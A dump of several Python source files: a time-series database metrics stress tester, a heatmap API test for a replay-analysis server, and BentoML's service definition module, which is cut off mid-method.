if not isinstance(f.name, text_type):
return
with FileLock(f.name) as lock:
path = basename(lock.lock_file_path)
assert not exists(join(f.name, path))
|
multiprocess_stress.py
|
import sys
import argparse
import socket
from socket import error as SocketError
from multiprocessing import Process, Queue
import requests
import json
import random
import time
import metrics
import select
from sys import stdout
from termcolor import colored
#Time Constants
NOW = 1404776380
ONE_YEAR_AGO = 1404776380 - 31557600
CONN_DELAY = 1
METRICS = metrics.metrics
class MetricPusher(object):
"""Stress-tests the specified storage engine by pushing as many randomly-
generated metrics as possible over telnet or HTTP API
"""
def __init__(self, engine, api, amount, threads, conns, remote, port):
self.amount = amount
self.api = api
self.engine = engine
self.threads = threads
self.conns = conns
self.remote = remote
self.port = port
self.suffix = "http_api_test"
self.open_files = []
# Check OS type
self.os = sys.platform
if self.os == 'linux2':
self.epoll = select.epoll()
elif self.os == 'darwin':
self.kq = select.kqueue()
self.metrics = METRICS
self.per_thread_count = self.amount / self.threads
self.max = 0
def print_status(self, numbers):
""" Print status line and percentage bar for each process """
sys.stdout.write('\033[2J\033[H')
total_count = 0
total_rate = 0
for process_num, tuple in numbers.items():
percent = (tuple[0] / float(self.per_thread_count))
bar = ('=' * int(percent * 30)).ljust(30)
count_msg = "Process %d: %7d/%d (%5d metrics/sec) [%s]%2d%%\n" % (process_num,
tuple[0],
self.per_thread_count,
tuple[1],
colored(bar, 'blue'),
percent*100)
stdout.write(count_msg)
total_count += tuple[0]
total_rate += tuple[1]
stdout.write(" Total: %7d/%d (%6d metrics/sec)\n" % (total_count, self.amount, total_rate))
if total_rate > self.max:
self.max = total_rate
stdout.flush()
def _setup(self):
"""
Open files
Create threads
Open sockets and register with epoll
Start threads and call _send on each thread
"""
status = Queue()
workers = []
numbers = {}
if self.api == "telnet":
# Threads
if self.os == 'linux2':
for thread_num in range(0, self.threads):
# Open sockets for this thread
open_sockets = {}
for num in range(0, self.conns):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_fileno = sock.fileno()
self.epoll.register(socket_fileno,
select.EPOLLOUT)
open_sockets[socket_fileno] = sock
print "Connecting to %s on port %s" % (self.remote,
self.port)
open_sockets[socket_fileno].connect((self.remote,
self.port))
# Start this process
print "Starting process #%s" % thread_num
p = Process(target=self._send, args=(open_sockets, thread_num, status))
p.start()
workers.append(p)
numbers[thread_num] = (0, 0)
while any(i.is_alive() for i in workers):
time.sleep(0.1)
while not status.empty():
process, s_count, s_rate = status.get()
numbers[process] = (s_count, s_rate)
self.print_status(numbers)
elif self.os == 'darwin':
for thread_num in range(0, self.threads):
# Open sockets for this thread
open_sockets = {}
for num in range(0, self.conns):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_fileno = sock.fileno()
open_sockets[socket_fileno] = sock
print "Connecting to %s on port %s" % (self.remote,
self.port)
open_sockets[socket_fileno].connect((self.remote,
self.port))
# Start this process
print "Starting process #%s" % thread_num
p = Process(target=self._send, args=(open_sockets, thread_num, status))
p.start()
workers.append(p)
numbers[thread_num] = (0, 0)
while any(i.is_alive() for i in workers):
time.sleep(0.1)
while not status.empty():
process, s_count, s_rate = status.get()
numbers[process] = (s_count, s_rate)
self.print_status(numbers)
elif self.api == "http":
for num in range(0, self.threads):
# Start this process
print "Starting process #%s" % num
p = Process(target=self._send, args=(None, ))
p.start()
def _send(self, open_sockets, process, status):
"""Send over the open sockets"""
count = 0
last_time = time.time()
if self.os == 'darwin':
kq = select.kqueue()
ev = []
for sock in open_sockets:
ev.append(select.kevent(sock,
select.KQ_FILTER_WRITE,
select.KQ_EV_ONESHOT | select.KQ_EV_ADD | select.KQ_EV_ENABLE))
if self.api == "telnet":
try:
while True:
# Get our epoll events
if self.os == 'linux2':
events = self.epoll.poll(5)
for fileNum, event in events:
if fileNum in open_sockets:
count += 1
if count % 5000 == 0:
time_delta = time.time() - last_time
# Send the current stats to the queue
status.put([process, count, int(count / time_delta)])
# Make a new metric
metric = self.metrics[random.randint(0, len(self.metrics)-1)]
metric_time = int(random.randint(ONE_YEAR_AGO, NOW))
amount = random.randint(0, 1000000)
tag = "stressTest"
# InfluxDB requires a different format and doesn't support tags
if self.engine == "influxdb":
# collectd_test_01.memory.memory.cached.value 2335620000 1404405000
message = "%s.%s %s %s\n" % (tag, metric, amount, metric_time)
# OpenTSDB and KairosDB are pretty similar though
else:
# put memory.memory.cached.value 1404405000000 2335620000 host=collectd_test_01
message = "put %s %s %s host=%s\n" % (metric, metric_time*1000, amount, tag)
# Send message
try:
data = open_sockets[fileNum].send(message)
except SocketError:
# Stop watching this socket
self.epoll.modify(fileNum, 0)
elif self.os == 'darwin':
revents = kq.control(ev, 1, None)
for event in revents:
if event.filter == select.KQ_FILTER_WRITE:
count += 1
if count % 5000 == 0:
time_delta = time.time() - last_time
# Send the current stats to the queue
status.put([process, count, int(count / time_delta)])
# Make a new metric
metric = self.metrics[random.randint(0, len(self.metrics)-1)]
metric_time = int(random.randint(ONE_YEAR_AGO, NOW))
amount = random.randint(0, 1000000)
tag = "stressTest"
# InfluxDB requires a different format and doesn't support tags
if self.engine == "influxdb":
# collectd_test_01.memory.memory.cached.value 2335620000 1404405000
message = "%s.%s %s %s\n" % (tag, metric, amount, metric_time)
# OpenTSDB and KairosDB are pretty similar though
else:
# put memory.memory.cached.value 1404405000000 2335620000 host=collectd_test_01
message = "put %s %s %s host=%s\n" % (metric, metric_time*1000, amount, tag)
# Send message
try:
data = open_sockets[event.ident].send(message)
except SocketError:
# Stop watching this socket
pass
# Stop sending when we reach limit of metrics specified
if (count*self.threads) == self.amount:
# Break out of while loop
time_delta = time.time() - last_time
status.put([process, count, int(count / time_delta)])
break
finally:
for client_socket in open_sockets:
# Should probably clean up sockets here
pass
elif self.api == "http":
if self.engine == "influxdb":
self.remote = 'localhost'
self.url = 'http://localhost:8086/db/graphite/series?u=brandon&p=password'
elif self.engine == "kairosdb":
self.remote = 'localhost'
self.url = 'http://localhost:8080/api/v1/datapoints'
while True:
                # Read the next line from the csv file
count += 1
data = file.readline().split(", ")
                if len(data) != 4:
return 0
metric = data[0]
metric_time = data[1][:10]
amount = data[2]
tag = data[3].rstrip('\n')
if self.engine == "kairosdb":
payload = [
{
'name': metric+self.suffix,
'timestamp': int(metric_time) * 1000,
'value': amount,
'tags': {
'host': tag
}
}
]
elif self.engine == "influxdb":
payload = [
{
'name': metric+self.suffix,
'columns': ['time', 'value'],
'points': [
[int(metric_time) * 1000, amount]
]
}
]
requests.post(self.url, data=json.dumps(payload))
# Stop sending when we reach limit of metrics specified
if count > self.amount:
# Break out of while loop
break
"""
Main run function
"""
def run(self):
self._setup()
print "Max rate: %d metrics/sec" % self.max
def main():
"""Parse arguments and run program"""
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--engine", help="influxdb | opentsdb | kairosdb", required=True)
parser.add_argument("-a", "--api", help="telnet | http", required=True)
parser.add_argument("-amt", "--amount", help="number of metrics to send", type=int, required=True)
parser.add_argument("-t", "--threads", help="number of threads to use; must be the same as number "
"of csv files in data/ directory", type=int, required=True)
parser.add_argument("-c", "--connections", help="number of sockets to open", type=int, required=True)
parser.add_argument("remote", help="IP of remote host")
parser.add_argument("port", help="Port of remote host", type=int)
args = parser.parse_args()
mp = MetricPusher(args.engine, args.api, args.amount, args.threads, args.connections, args.remote, args.port)
mp.run()
return 0
if __name__ == "__main__":
sys.exit(main())
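# Example invocation (host and port are placeholders; 4242 is the usual OpenTSDB
# telnet listener): push 100000 random metrics over 4 processes with 8 sockets each.
#   python multiprocess_stress.py -e opentsdb -a telnet -amt 100000 -t 4 -c 8 192.168.1.10 4242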
|
heatmaps_test.py
|
import base64
import json
import logging
import time
import zlib
import requests
from RLBotServer import start_server
from backend.blueprints.spa_api.service_layers.replay.enums import HeatMapType
from backend.tasks.add_replay import save_replay
from tests.utils.killable_thread import KillableThread
from tests.utils.replay_utils import write_proto_pandas_to_file, get_test_file, download_replay_discord
from backend.utils.file_manager import PANDAS_EXTENSION, PROTO_EXTENSION
LOCAL_URL = 'http://localhost:8000'
class Test_Heatmaps:
@classmethod
def setup_class(cls):
logging.basicConfig(level=logging.ERROR)
cls.thread = KillableThread(target=start_server)
cls.thread.daemon = True
cls.thread.start()
print('waiting for a bit')
time.sleep(5)
print('done waiting')
def test_heatmaps(self, use_test_paths, temp_file):
use_test_paths.patch()
test_path = use_test_paths.get_temp_path()
proto, pandas, proto_game = write_proto_pandas_to_file(get_test_file("ALL_STAR.replay",
is_replay=True))
with open(proto, 'rb') as f:
encoded_proto = base64.b64encode(zlib.compress(f.read())).decode()
obj = {
'status': '200',
'proto': encoded_proto
}
r = requests.post(LOCAL_URL + '/api/upload/proto', json=obj)
r.raise_for_status()
assert(r.status_code == 200)
save_replay(proto_game, temp_file, pandas[:-len(PANDAS_EXTENSION)], proto[:-len(PROTO_EXTENSION)])
r = requests.get(LOCAL_URL + '/api/global/replay_count')
result = json.loads(r.content)
assert int(result) > 0, 'This test can not run without a replay in the database'
# test default
self.assert_heatmap(proto_game, has_ball=True)
# test query params
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.POSITIONING.value}, has_ball=True)
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.BOOST.value})
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.BOOST_COLLECT.value})
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.BOOST_SPEED.value})
self.assert_heatmap(proto_game, query_params={"type": HeatMapType.SLOW_SPEED.value})
def assert_heatmap(self, proto_game, query_params=None, has_ball=False):
id = proto_game.game_metadata.match_guid
r = requests.get(LOCAL_URL + '/api/replay/' + id + '/heatmaps',
params=query_params)
r.raise_for_status()
assert r.status_code == 200
result = json.loads(r.content)
assert 'data' in result
assert 'maxs' in result
def assert_keys(value):
if has_ball:
assert 'ball' in value
assert proto_game.players[0].name in value
assert_keys(result['data'])
assert_keys(result['maxs'])
@classmethod
def teardown_class(cls):
try:
cls.thread.terminate()
except:
pass
cls.thread.join()
time.sleep(2)
|
__init__.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tempfile
import threading
import uuid
from datetime import datetime
from typing import List
from bentoml import config
from bentoml.adapters import BaseInputAdapter, BaseOutputAdapter, DefaultOutput
from bentoml.configuration import get_bentoml_deploy_version
from bentoml.exceptions import BentoMLException, InvalidArgument, NotFound
from bentoml.saved_bundle import save_to_dir
from bentoml.saved_bundle.config import SavedBundleConfig
from bentoml.saved_bundle.pip_pkg import seek_pip_packages
from bentoml.service.artifacts import ArtifactCollection, BentoServiceArtifact
from bentoml.service.env import BentoServiceEnv
from bentoml.service.inference_api import InferenceAPI
from bentoml.utils.hybridmethod import hybridmethod
ARTIFACTS_DIR_NAME = "artifacts"
DEFAULT_MAX_LATENCY = config("marshal_server").getint("default_max_latency")
DEFAULT_MAX_BATCH_SIZE = config("marshal_server").getint("default_max_batch_size")
BENTOML_RESERVED_API_NAMES = [
"index",
"swagger",
"docs",
"healthz",
"metrics",
"feedback",
]
logger = logging.getLogger(__name__)
prediction_logger = logging.getLogger("bentoml.prediction")
def validate_inference_api_name(api_name: str):
if not api_name.isidentifier():
raise InvalidArgument(
"Invalid API name: '{}', a valid identifier may only contain letters,"
" numbers, underscores and not starting with a number.".format(api_name)
)
if api_name in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API name: '{}' is reserved for infra endpoints".format(api_name)
)
def api_decorator(
*args,
input: BaseInputAdapter = None,
output: BaseOutputAdapter = None,
api_name: str = None,
api_doc: str = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
batch=False,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param input: InputAdapter instance of the inference API
:param output: OutputAdapter instance of the inference API
:param api_name: API name, default to the user-defined callback function's function
name
:param api_doc: user-facing documentation of the inference API. default to the
user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(input=JsonInput(), batch=True)
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(input=DataframeInput(input_json_orient='records'), batch=True)
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
validate_inference_api_name(_api_name)
_api_doc = func.__doc__ if api_doc is None else api_doc
if input is None:
# Raise error when input adapter class passed without instantiation
if not args or not (
inspect.isclass(args[0]) and issubclass(args[0], BaseInputAdapter)
):
raise InvalidArgument(
"BentoService @api decorator first parameter must "
"be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter "
)
# noinspection PyPep8Naming
InputAdapter = args[0]
input_adapter = InputAdapter(*args[1:], **kwargs)
output_adapter = DefaultOutput()
else:
assert isinstance(input, BaseInputAdapter), (
"API input parameter must be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter"
)
input_adapter = input
output_adapter = output or DefaultOutput()
setattr(func, "_is_api", True)
setattr(func, "_input_adapter", input_adapter)
setattr(func, "_output_adapter", output_adapter)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_mb_max_batch_size", mb_max_batch_size)
setattr(func, "_mb_max_latency", mb_max_latency)
setattr(func, "_batch", batch)
return func
return decorator
def web_static_content_decorator(web_static_content):
"""Define web UI static files required to be bundled with a BentoService
Args:
        web_static_content: path to the directory containing index.html and the static dir
>>> @web_static_content('./ui/')
>>> class MyMLService(BentoService):
>>> pass
"""
def decorator(bento_service_cls):
bento_service_cls._web_static_content = web_static_content
return bento_service_cls
return decorator
def artifacts_decorator(artifacts: List[BentoServiceArtifact]):
"""Define artifacts required to be bundled with a BentoService
Args:
artifacts (list(bentoml.artifact.BentoServiceArtifact)): A list of desired
artifacts required by this BentoService
"""
def decorator(bento_service_cls):
artifact_names = set()
for artifact in artifacts:
if not isinstance(artifact, BentoServiceArtifact):
raise InvalidArgument(
"BentoService @artifacts decorator only accept list of "
"BentoServiceArtifact instances, instead got type: '%s'"
% type(artifact)
)
if artifact.name in artifact_names:
raise InvalidArgument(
"Duplicated artifact name `%s` detected. Each artifact within one"
"BentoService must have an unique name" % artifact.name
)
artifact_names.add(artifact.name)
bento_service_cls._declared_artifacts = artifacts
return bento_service_cls
return decorator
def env_decorator(
pip_dependencies: List[str] = None,
pip_packages: List[str] = None,
pip_index_url: str = None,
pip_trusted_host: str = None,
pip_extra_index_url: str = None,
auto_pip_dependencies: bool = False,
infer_pip_packages: bool = False,
requirements_txt_file: str = None,
conda_channels: List[str] = None,
conda_overwrite_channels: bool = False,
conda_dependencies: List[str] = None,
conda_env_yml_file: str = None,
setup_sh: str = None,
docker_base_image: str = None,
zipimport_archives: List[str] = None,
):
"""Define environment and dependencies required for the BentoService being created
Args:
        pip_packages: list of pip packages required, specified by package name
or with specified version `{package_name}=={package_version}`
pip_dependencies: same as pip_packages but deprecated
pip_index_url: passing down to pip install --index-url option
pip_trusted_host: passing down to pip install --trusted-host option
pip_extra_index_url: passing down to pip install --extra-index-url option
infer_pip_packages: whether to automatically find all the required
pip dependencies and pin their version
auto_pip_dependencies: same as infer_pip_packages but deprecated
requirements_txt_file: pip dependencies in the form of a requirements.txt file,
this can be a relative path to the requirements.txt file or the content
of the file
conda_channels: list of extra conda channels to be used
conda_overwrite_channels: Turn on to make conda_channels overwrite the list of
channels instead of adding to it
conda_dependencies: list of conda dependencies required
conda_env_yml_file: use a pre-defined conda environment yml file
setup_sh: user defined setup bash script, it is executed in docker build time
docker_base_image: used for customizing the docker container image built with
BentoML saved bundle. Base image must either have both `bash` and `conda`
installed; or have `bash`, `pip`, `python` installed, in which case the user
is required to ensure the python version matches the BentoService bundle
zipimport_archives: list of zipimport archives paths relative to the module path
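    Example usage (a minimal sketch; the package pin and base image below are
    placeholders, not defaults of this decorator):

    >>> @env(
    >>>     infer_pip_packages=True,
    >>>     pip_packages=["pandas==1.1.5"],
    >>>     docker_base_image="python:3.8-slim",
    >>> )
    >>> class MyMLService(BentoService):
    >>>     pass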
"""
def decorator(bento_service_cls):
bento_service_cls._env = BentoServiceEnv(
pip_packages=pip_packages or pip_dependencies,
pip_index_url=pip_index_url,
pip_trusted_host=pip_trusted_host,
pip_extra_index_url=pip_extra_index_url,
infer_pip_packages=infer_pip_packages or auto_pip_dependencies,
requirements_txt_file=requirements_txt_file,
conda_channels=conda_channels,
conda_overwrite_channels=conda_overwrite_channels,
conda_dependencies=conda_dependencies,
conda_env_yml_file=conda_env_yml_file,
setup_sh=setup_sh,
docker_base_image=docker_base_image,
zipimport_archives=zipimport_archives,
)
return bento_service_cls
return decorator
def ver_decorator(major, minor):
"""Decorator for specifying the version of a custom BentoService.
Args:
major (int): Major version number for Bento Service
minor (int): Minor version number for Bento Service
BentoML uses semantic versioning for BentoService distribution:
* MAJOR is incremented when you make breaking API changes
* MINOR is incremented when you add new functionality without breaking the
existing API or functionality
* PATCH is incremented when you make backwards-compatible bug fixes
    'Patch' is provided (or auto-generated) when calling BentoService#save,
while 'Major' and 'Minor' can be defined with '@ver' decorator
>>> from bentoml import ver, artifacts
>>> from bentoml.service.artifacts.common import PickleArtifact
>>>
>>> @ver(major=1, minor=4)
>>> @artifacts([PickleArtifact('model')])
>>> class MyMLService(BentoService):
>>> pass
>>>
>>> svc = MyMLService()
>>> svc.pack("model", trained_classifier)
>>> svc.set_version("2019-08.iteration20")
>>> svc.save()
>>> # The final produced BentoService bundle will have version:
>>> # "1.4.2019-08.iteration20"
"""
def decorator(bento_service_cls):
bento_service_cls._version_major = major
bento_service_cls._version_minor = minor
return bento_service_cls
return decorator
def validate_version_str(version_str):
"""
Validate that version str format is either a simple version string that:
        * Consists only of ALPHA / DIGIT / "-" / "." / "_"
* Length between 1-128
Or a valid semantic version https://github.com/semver/semver/blob/master/semver.md
"""
regex = r"[A-Za-z0-9_.-]{1,128}\Z"
semver_regex = r"^(?P<major>0|[1-9]\d*)\.(?P<minor>0|[1-9]\d*)\.(?P<patch>0|[1-9]\d*)(?:-(?P<prerelease>(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+(?P<buildmetadata>[0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # noqa: E501
if (
re.match(regex, version_str) is None
and re.match(semver_regex, version_str) is None
):
raise InvalidArgument(
            'Invalid BentoService version: "{}", it can only consist of'
            ' ALPHA / DIGIT / "-" / "." / "_", and must be less than '
            "128 characters".format(version_str)
)
if version_str.lower() == "latest":
raise InvalidArgument('BentoService version can not be set to "latest"')
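# Illustration (not part of the library API) of what validate_version_str accepts:
# strings made of ALPHA / DIGIT / "-" / "." / "_" and full semantic versions pass
# silently, while illegal characters or the literal "latest" raise InvalidArgument.
#   validate_version_str("20191009135240_D246ED")    # ok
#   validate_version_str("1.4.2019-08.iteration20")  # ok
#   validate_version_str("latest")                   # raises InvalidArgument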
def save(bento_service, base_path=None, version=None, labels=None):
"""
Save and register the given BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and metadata
in local file system under the $BENTOML_HOME(~/bentoml) directory. Users can also
configure BentoML to save their BentoService to a shared Database and cloud object
storage such as AWS S3.
:param bento_service: target BentoService instance to be saved
:param base_path: optional - override repository base path
:param version: optional - save with version override
:param labels: optional - user defined labels
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import YataiClient
from bentoml.yatai.yatai_service import get_yatai_service
if base_path:
yatai_service = get_yatai_service(repo_base_url=base_path)
yatai_client = YataiClient(yatai_service)
else:
yatai_client = YataiClient()
return yatai_client.repository.upload(bento_service, version, labels)
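# Hypothetical sketch of calling the module-level save() helper above (the service
# class, artifact name and labels are placeholders):
#   svc = MyMLService()
#   svc.pack("model", trained_classifier)
#   saved_path = save(svc, labels={"stage": "dev"})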
class BentoService:
"""
BentoService is the base component for building prediction services using BentoML.
BentoService provide an abstraction for describing model artifacts and environment
dependencies required for a prediction service. And allows users to create inference
APIs that defines the inferencing logic and how the underlying model can be served.
Each BentoService can contain multiple models and serve multiple inference APIs.
Usage example:
>>> from bentoml import BentoService, env, api, artifacts
>>> from bentoml.adapters import DataframeInput
>>> from bentoml.frameworks.sklearn import SklearnModelArtifact
>>>
>>> @artifacts([SklearnModelArtifact('clf')])
>>> @env(pip_packages=["scikit-learn"])
>>> class MyMLService(BentoService):
>>>
>>> @api(input=DataframeInput(), batch=True)
>>> def predict(self, df):
>>> return self.artifacts.clf.predict(df)
>>>
>>> if __name__ == "__main__":
>>> bento_service = MyMLService()
>>> bento_service.pack('clf', trained_classifier_model)
>>> bento_service.save_to_dir('/bentoml_bundles')
"""
# List of inference APIs that this BentoService provides
_inference_apis: List[InferenceAPI] = []
    # Name of this BentoService. It defaults to the class name of this BentoService class
_bento_service_name: str = None
# For BentoService loaded from saved bundle, this will be set to the path of bundle.
# When user install BentoService bundle as a PyPI package, this will be set to the
# installed site-package location of current python environment
_bento_service_bundle_path: str = None
# List of artifacts required by this BentoService class, declared via the `@env`
# decorator. This list is used for initializing an empty ArtifactCollection when
# the BentoService class is instantiated
_declared_artifacts: List[BentoServiceArtifact] = []
# An instance of ArtifactCollection, containing all required trained model artifacts
_artifacts: ArtifactCollection = None
# A `BentoServiceEnv` instance specifying the required dependencies and all system
# environment setups
_env = None
# When loading BentoService from saved bundle, this will be set to the version of
# the saved BentoService bundle
_bento_service_bundle_version = None
# See `ver_decorator` function above for more information
_version_major = None
_version_minor = None
# See `web_static_content` function above for more
_web_static_content = None
def __init__(self):
# When creating BentoService instance from a saved bundle, set version to the
# version specified in the saved bundle
self._bento_service_version = self.__class__._bento_service_bundle_version
self._config_artifacts()
self._config_inference_apis()
self._config_environments()
self._dev_server_bundle_path: tempfile.TemporaryDirectory = None
self._dev_server_interrupt_event: multiprocessing.Event = None
        self._dev_server_process: multiprocessing.Process = None
def _config_environments(self):
self._env = self.__class__._env or BentoServiceEnv()
for api in self._inference_apis:
self._env.add_pip_packages(api.input_adapter.pip_dependencies)
self._env.add_pip_packages(api.output_adapter.pip_dependencies)
for artifact in self.artifacts.get_artifact_list():
artifact.set_dependencies(self.env)
def _config_inference_apis(self):
self._inference_apis = []
for _, function in inspect.getmembers(
self.__class__,
predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
):
if hasattr(function, "_is_api"):
api_name = getattr(function, "_api_name")
api_doc = getattr(function, "_api_doc")
input_adapter = getattr(function, "_input_adapter")
output_adapter = getattr(function, "_output_adapter")
mb_max_latency = getattr(function, "_mb_max_latency")
mb_max_batch_size = getattr(function, "_mb_max_batch_size")
batch = getattr(function, "_batch")
# Bind api method call with self(BentoService instance)
user_func = function.__get__(self)
self._inference_apis.append(
InferenceAPI(
self,
api_name,
api_doc,
input_adapter=input_adapter,
user_func=user_func,
output_adapter=output_adapter,
mb_max_latency=mb_max_latency,
mb_max_batch_size=mb_max_batch_size,
batch=batch,
)
)
def _config_artifacts(self):
self._artifacts = ArtifactCollection.from_artifact_list(
self._declared_artifacts
)
if self._bento_service_bundle_path:
# For pip installed BentoService, artifacts directory is located at
# 'package_path/artifacts/', but for loading from bundle directory, it is
# in 'path/{service_name}/artifacts/'
if os.path.isdir(
os.path.join(self._bento_service_bundle_path, ARTIFACTS_DIR_NAME)
):
artifacts_path = os.path.join(
self._bento_service_bundle_path, ARTIFACTS_DIR_NAME
)
else:
artifacts_path = os.path.join(
self._bento_service_bundle_path, self.name, ARTIFACTS_DIR_NAME
)
self.artifacts.load_all(artifacts_path)
@property
def inference_apis(self):
"""Return a list of user defined API functions
Returns:
list(InferenceAPI): List of Inference API objects
"""
return self._inference_apis
def get_inference_api(self, api_name):
"""Find the inference API in this BentoService with a specific name.
When the api_name is None, this returns the first Inference API found in the
`self.inference_apis` list.
:param api_name: the target Inference API's name
:return:
"""
if api_name:
try:
return next(
(api for api in self.inference_apis if api.name == api_name)
)
except StopIteration:
raise NotFound(
"Can't find API '{}' in service '{}'".format(api_name, self.name)
)
elif len(self.inference_apis) > 0:
return self.inference_apis[0]
else:
raise NotFound(f"Can't find any inference API in service '{self.name}'")
@property
def artifacts(self):
""" Returns the ArtifactCollection instance specified with this BentoService
class
Returns:
artifacts(ArtifactCollection): A dictionary of packed artifacts from the
artifact name to the BentoServiceArtifact instance
"""
return self._artifacts
@property
def env(self):
return self._env
@property
def web_static_content(self):
return self._web_static_content
def get_web_static_content_path(self):
if not self.web_static_content:
return None
if self._bento_service_bundle_path:
return os.path.join(
self._bento_service_bundle_path, self.name, 'web_static_content'
)
else:
return os.path.join(os.getcwd(), self.web_static_content)
@hybridmethod
@property
def name(self):
"""
:return: BentoService name
"""
return self.__class__.name() # pylint: disable=no-value-for-parameter
@name.classmethod
def name(cls): # pylint: disable=no-self-argument,invalid-overridden-method
"""
:return: BentoService name
"""
if cls._bento_service_name is not None:
if not cls._bento_service_name.isidentifier():
raise InvalidArgument(
                    'BentoService#_bento_service_name must be a valid python identifier '
                    'matching regex `(letter|"_")(letter|digit|"_")*`'
)
return cls._bento_service_name
else:
# Use python class name as service name
return cls.__name__
def set_version(self, version_str=None):
"""Set the version of this BentoService instance. Once the version is set
explicitly via `set_version`, the `self.versioneer` method will no longer be
invoked when saving this BentoService.
"""
if version_str is None:
version_str = self.versioneer()
if self._version_major is not None and self._version_minor is not None:
# BentoML uses semantic versioning for BentoService distribution
# when user specified the MAJOR and MINOR version number along with
# the BentoService class definition with '@ver' decorator.
# The parameter version(or auto generated version) here will be used as
# PATCH field in the final version:
version_str = ".".join(
[str(self._version_major), str(self._version_minor), version_str]
)
validate_version_str(version_str)
if self.__class__._bento_service_bundle_version is not None:
logger.warning(
"Overriding loaded BentoService(%s) version:%s to %s",
self.__class__._bento_service_bundle_path,
self.__class__._bento_service_bundle_version,
version_str,
)
self.__class__._bento_service_bundle_version = None
if (
self._bento_service_version is not None
and self._bento_service_version != version_str
):
logger.warning(
"Resetting BentoService '%s' version from %s to %s",
self.name,
self._bento_service_version,
version_str,
)
self._bento_service_version = version_str
return self._bento_service_version
def versioneer(self):
"""
Function used to generate a new version string when saving a new BentoService
bundle. User can also override this function to get a customized version format
"""
datetime_string = datetime.now().strftime("%Y%m%d%H%M%S")
random_hash = uuid.uuid4().hex[:6].upper()
# Example output: '20191009135240_D246ED'
return datetime_string + "_" + random_hash
@property
def version(self):
"""
Return the version of this BentoService. If the version of this BentoService has
not been set explicitly via `self.set_version`, a new version will be generated
with the `self.versioneer` method. User can customize this version str either by
setting the version with `self.set_version` before a `save` call, or override
the `self.versioneer` method to customize the version str generator logic.
For BentoService loaded from a saved bundle, this will simply return the version
information found in the saved bundle.
:return: BentoService version str
"""
if self.__class__._bento_service_bundle_version is not None:
return self.__class__._bento_service_bundle_version
if self._bento_service_version is None:
self.set_version(self.versioneer())
return self._bento_service_version
def save(self, yatai_url=None, version=None, labels=None):
"""
Save and register this BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and
metadata in local file system under the $BENTOML_HOME(~/bentoml) directory.
Users can also configure BentoML to save their BentoService to a shared Database
and cloud object storage such as AWS S3.
:param yatai_url: optional - URL path to Yatai server
:param version: optional - save with version override
:param labels: optional - labels dictionary
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import get_yatai_client
yc = get_yatai_client(yatai_url)
return yc.repository.upload(self, version, labels)
def save_to_dir(self, path, version=None):
"""Save this BentoService along with all its artifacts, source code and
        dependencies to the target file path, assuming the path exists and is empty. If the
        target path is not empty, this call may override existing files in the given path.
:param path (str): Destination of where the bento service will be saved
:param version: optional - save with version override
"""
return save_to_dir(self, path, version)
@hybridmethod
def pack(self, name, *args, **kwargs):
"""
BentoService#pack method is used for packing trained model instances with a
BentoService instance and make it ready for BentoService#save.
pack(name, *args, **kwargs):
:param name: name of the declared model artifact
:param args: args passing to the target model artifact to be packed
:param kwargs: kwargs passing to the target model artifact to be packed
:return: this BentoService instance
"""
self.artifacts.get(name).pack(*args, **kwargs)
return self
@pack.classmethod
def pack(cls, *args, **kwargs): # pylint: disable=no-self-argument
"""
**Deprecated**: Legacy `BentoService#pack` class method, no longer supported
"""
raise BentoMLException(
"BentoService#pack class method is deprecated, use instance method `pack` "
"instead. e.g.: svc = MyBentoService(); svc.pack('model', model_object)"
)
def get_bento_service_metadata_pb(self):
return SavedBundleConfig(self).get_bento_service_metadata_pb()
pip_dependencies_map = None
def start_dev_server(self, port=None, enable_microbatch=False, enable_ngrok=False):
if enable_microbatch:
raise NotImplementedError(
"start_dev_server with enable_microbatch=True is not implemented"
)
if self._dev_server_process:
logger.warning(
"There is already a running dev server, "
"please call `service.stop_dev_server()` first."
)
return
try:
self._dev_server_bundle_path = tempfile.TemporaryDirectory()
self.save_to_dir(self._dev_server_bundle_path.name)
def print_log(p):
for line in p.stdout:
print(line.decode(), end='')
